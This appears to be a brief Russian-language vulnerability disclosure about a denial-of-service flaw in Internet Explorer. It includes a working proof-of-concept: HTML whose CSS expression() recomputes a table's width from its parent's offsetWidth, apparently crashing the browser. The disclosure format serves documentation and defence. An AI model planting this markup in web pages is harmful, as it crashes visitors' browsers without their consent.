Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Internet Explorer
Удаленный нападающий может вызвать отказ в обслуживании.
Эксплоит:
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWidth+'px');">
<tr><td></td></tr>
</table>
</div>